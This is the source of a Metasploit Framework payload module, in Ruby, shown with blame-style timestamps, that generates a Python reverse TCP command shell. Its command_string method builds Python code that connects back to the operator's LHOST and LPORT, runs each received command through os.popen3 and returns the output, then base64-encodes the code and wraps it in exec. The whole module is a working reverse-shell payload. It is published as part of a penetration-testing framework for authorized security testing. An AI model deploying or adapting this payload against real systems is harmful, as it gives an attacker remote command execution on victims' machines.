metasploit-framework/modules/payloads/singles/python/shell_reverse_tcp.rb

71 lines
2.0 KiB
Ruby
Raw Normal View History

2014-06-04 01:27:06 +00:00
##
# This module requires Metasploit: http://metasploit.com/download
2014-06-04 01:27:06 +00:00
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
2014-06-09 20:41:38 +00:00
require 'msf/core/handler/reverse_tcp'
2014-06-04 01:27:06 +00:00
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
CachedSize = 381
2014-06-04 01:27:06 +00:00
include Msf::Payload::Single
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'Command Shell, Reverse TCP (via python)',
2014-06-16 16:40:21 +00:00
'Description' => 'Creates an interactive shell via python, encodes with base64 by design. Compatible with Python 2.3.3',
2014-06-04 01:27:06 +00:00
'Author' => 'Ben Campbell', # Based on RageLtMan's reverse_ssl
2014-06-09 20:41:38 +00:00
'License' => MSF_LICENSE,
2014-06-04 01:27:06 +00:00
'Platform' => 'python',
'Arch' => ARCH_PYTHON,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::CommandShell,
'PayloadType' => 'python',
'Payload' =>
{
'Offsets' => { },
'Payload' => ''
}
))
end
#
# Constructs the payload
#
def generate
super + command_string
end
#
# Returns the command string to use for execution
#
def command_string
cmd = ''
dead = Rex::Text.rand_text_alpha(2)
# Set up the socket
cmd << "import socket,os\n"
cmd << "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
cmd << "so.connect(('#{datastore['LHOST']}',#{ datastore['LPORT']}))\n"
# The actual IO
cmd << "#{dead}=False\n"
cmd << "while not #{dead}:\n"
cmd << "\tdata=so.recv(1024)\n"
cmd << "\tif len(data)==0:\n\t\t#{dead}=True\n"
cmd << "\tstdin,stdout,stderr,=os.popen3(data)\n"
cmd << "\tstdout_value=stdout.read()+stderr.read()\n"
cmd << "\tso.send(stdout_value)\n"
# Base64 encoding is required in order to handle Python's formatting requirements in the while loop
cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"
cmd
end
end